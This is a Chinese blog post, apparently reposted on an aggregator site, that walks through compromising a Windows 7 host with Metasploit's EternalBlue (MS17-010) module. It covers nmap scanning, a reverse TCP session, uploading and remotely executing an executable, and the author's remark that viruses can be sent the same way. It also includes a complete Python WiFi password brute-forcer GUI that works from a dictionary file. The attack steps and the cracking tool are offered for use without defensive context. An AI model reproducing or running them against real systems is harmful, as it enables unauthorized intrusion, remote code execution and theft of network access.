Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件

这篇具有很好参考价值的文章主要介绍了Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档


前言

提示:这里可以添加本文要记录的大概内容:

我昨天我测试了,没成功所以SSH爆破先不写了,我已经把永恒之蓝漏洞玩明白了,这回是采用实战的方式进行入侵。


提示:以下是本篇文章正文内容,下面案例可供参考

一、信息收集

第一步,信息收集
Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件
先查找自己的IP地址以方便查找同局域网的设备
Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件
然后使用nmap -O以一个一个扫
看我找到了什么
Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件
找到了,正好开放445端口
Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件

二、开始入侵

1.启动msfconsole

msfconsole

Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件
启动成功了,搜索ms漏洞

2.搜索漏洞

search ms17_010

然后扔给我们这些东西,以前用过的知道该使用哪个
Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件
输入:

use exploit/windows/smb/ms17_010_eternalblue

Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件
看到这个样子就是成功了,然后我们执行下一步,查找要设置的参数,输入options
Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件
yes是必须要设置的,no可以弄也可以不弄,我懒得弄了,
Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件
IP一定要设为目标的IP地址,然后我们再options
Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件
已经都准备好了,可以进行入侵了,输入

run

Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件

[*] Started reverse TCP handler on 192.168.22.13:4444 

这串代码讲的是开始反向TCP监听,监听本机的IP和端口

192.168.22.196:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.22.196:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7600 x64 (64-bit)
[*] 192.168.22.196:445    - Scanned 1 of 1 hosts (100% complete)

这串代码讲的是主机存在漏洞
然后哇啦哇啦,一顿准备
Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件
出现win了,已经渗透成功了

3.文件上传

Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件
我送给它安装DEV-c++吧

upload /路径/xxx.exe

Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件
上传完了,但上传到哪里了呢?
输入pwd可以看到在system32文件下
让我们运行它
输入

execute -f xxx.exe

-f是运行指定文件
Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件
好吧,我的报错了,原因我改了文件,至少远程启动文件了,也可以发送病毒并执行

其他

from tkinter import *
from pywifi import const
import pywifi
import time

def wificonnect(str, wifiname):
    # 窗口无线对象
    wifi = pywifi.PyWiFi()
    # 抓取第一个无线网卡
    ifaces = wifi.interfaces()[0]
    # 断开所有的wifi
    ifaces.disconnect()
    time.sleep(0)
    if ifaces.status() == const.IFACE_DISCONNECTED:
        # 创建wifi连接文件
        profile = pywifi.Profile()
        profile.ssid = wifiname
        # wifi的加密算法
        profile.akm.append(const.AKM_TYPE_WPA2PSK)
        # wifi的密码
        profile.key = str
        # 网卡的开发
        profile.auth = const.AUTH_ALG_OPEN
        # 加密单元,这里需要写点加密单元否则无法连接
        profile.cipher = const.CIPHER_TYPE_CCMP
        # 删除所有的wifi文件
        ifaces.remove_all_network_profiles()
        # 设置新的连接文件
        tep_profile = ifaces.add_network_profile(profile)
        # 连接
        ifaces.connect(tep_profile)
        time.sleep(1)
        if ifaces.status() == const.IFACE_CONNECTED:
            return True
        else:
            return False

def readPwd():
    # 获取wifi名称
    wifiname = entry.get().strip()
    path = r'./pwd.txt'
    file = open(path, 'r')
    while True:
        try:
            # 读取
            mystr = file.readline().strip()
            # 测试连接
            bool = wificonnect(mystr, wifiname)
            if bool:
                text.insert(END, '这个密码是正确的' + mystr)
                text.see(END)
                text.update()
                file.close()
                break
            else:
                text.insert(END, '这个密码是错误的' + mystr)
                text.see(END)
                text.update()
        except:
            continue

# 创建窗口
root = Tk()
root.title('wifi万能爆破器')
root.geometry('900x600')
# 标签
label = Label(root, text='输入要爆破的WIFI:')
# 定位
label.grid()
# 输入控件
entry = Entry(root, font=('微软雅黑', 20))
entry.grid(row=0, column=1)
# 列表控件
text = Listbox(root, font=('微软雅黑', 20), width=40, height=10)
text.grid(row=1, columnspan=15)
# 按钮
button = Button(root, text='开始爆破', width=20, height=2, command=readPwd)
button.grid(row=2, columnspan=2)
# 显示窗口
root.mainloop()

既然要联网肯定要联网,废话文学 这是我和chat gpt连夜写的,单纯只是密码爆破,嘿嘿
字典自己准备,网上一大堆,一搜一大把


总结

本文就是讲解远程控制并执行文件文章来源地址https://www.toymoban.com/news/detail-463705.html

到了这里,关于Msfconsole使用永恒之蓝入侵Win7并上传执行可执行文件的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • MS17-010漏洞攻击与防御(利用永恒之蓝攻击Win7系统)

    任务1 利用永恒之蓝攻击Win7系统 在Kali终端中输入命令“msfconsole ”,启动Metasploit;输入命令“use auxiliary/scanner/smb/smb_ms17_010”,加载扫描模块;输入命令“set RHOSTS 192.168.0.6”,设置需要被扫描的目标主机地址;输入命令“run”,进行扫描并观察是否存在该漏洞   输入命令“

    2024年02月05日
    浏览(41)
  • MS17-010永恒之蓝漏洞利用,win32安装,windows 7 32位

    漏洞复现:MS17-010 漏洞利用的条件:1.靶机开启445端口(如果未打开该端口将会攻击失败,百度打开445端口)                              2.关闭防火墙 靶机:windows 7(未知X32位还是X64位) ip:192.168.1.9 攻击机:kali linux (X64) ip:192.168.1.101 使用工具:meatsploit,nmap 前期准备工作 :

    2024年02月08日
    浏览(38)
  • kali入侵win7(转载)

    前言: 本文的目的并不是教会学者入侵win7主机, 而是被入侵之后怎么反制并且做好下一步的防范 以及查到攻击者的蛛丝马迹 攻击原理: 利用未修复永恒之蓝的445端口漏洞入侵目标主机 演示设备: 主机 IP kali Linux 10.11.4.3 Windows7 10.11.4.152 (win7条件为无防火墙,无杀软) 攻击前准备

    2024年02月04日
    浏览(66)
  • kali木马入侵win7系统

    VMWare16百度网盘 提取码:ljb3 kali百度网盘 提取码:v6zf win7镜像百度网盘 提取码:ws1u -p 是选择载荷 -f 是选择输出格式 检测到之后输入shell即可

    2024年02月11日
    浏览(34)
  • ms17-010永恒之蓝使用和防范(内附视频)

    1.什么是永恒之蓝: 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,整个

    2024年02月08日
    浏览(36)
  • 网安-入门永恒之蓝/黑

    实验环境:win7,kali 实验目的:拿到win7管理员权限 扫描该网段 nmap -sP 192.168.164.0/24,查看win7ip,也可在win7上查询 扫描端口,445,永恒之蓝是通过445端口进行攻击的 masscan --rate=10000 -p1-65535 192.168.164.128 测试连通性,互相ping通 输入命令masfconsole,进入框架 输入命令search ms17-0

    2024年01月18日
    浏览(34)
  • 网络攻防——永恒之蓝

    1.引言     让一个不爱学习的人整天蒙英语题,听张宇的视频实在是枯燥了点,于是决定看看网安,积累积累一些有趣的玩意儿。然后,自己不是专业的,也不是为了工作,可能会查阅大佬的博文,然后把概念借鉴过来,会留下参考链接的,如果博主不同意引用直接评论

    2023年04月26日
    浏览(68)
  • 渗透基础+永恒之蓝演练

    渗透测试是对用户信息安全措施积极评估的过程。通过系统化的操作和分析,积极发现系统和网络中存在的各种缺陷和弱点,如涉及缺陷和技术缺陷。渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法,这个过程包括对系统的任何弱点、技

    2024年02月08日
    浏览(49)
  • 永恒之蓝(ms17010)漏洞利用

    目录 1.启动msf 2.检查msf库里是否存在ms17-010漏洞 3.扫描靶机开放端口 4.配置目标ip,本地ip并利用exploit进行攻击

    2024年02月11日
    浏览(32)
  • MS17010(永恒之蓝)漏洞实战

    曾因苦难多壮志,不教红尘惑坚心。 使用搜索命令,搜索ms17_010 search ms17_010 搜索网段中主机漏洞 use auxiliary/scanner/smb/smb_ms17_010 照例,show options 看一下配置 设置网段,run运行就行了 使用攻击模块 查看所需要的配置show options 开始配置payload、渗透地址、监听地址 开始攻击输入

    2024年02月07日
    浏览(29)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包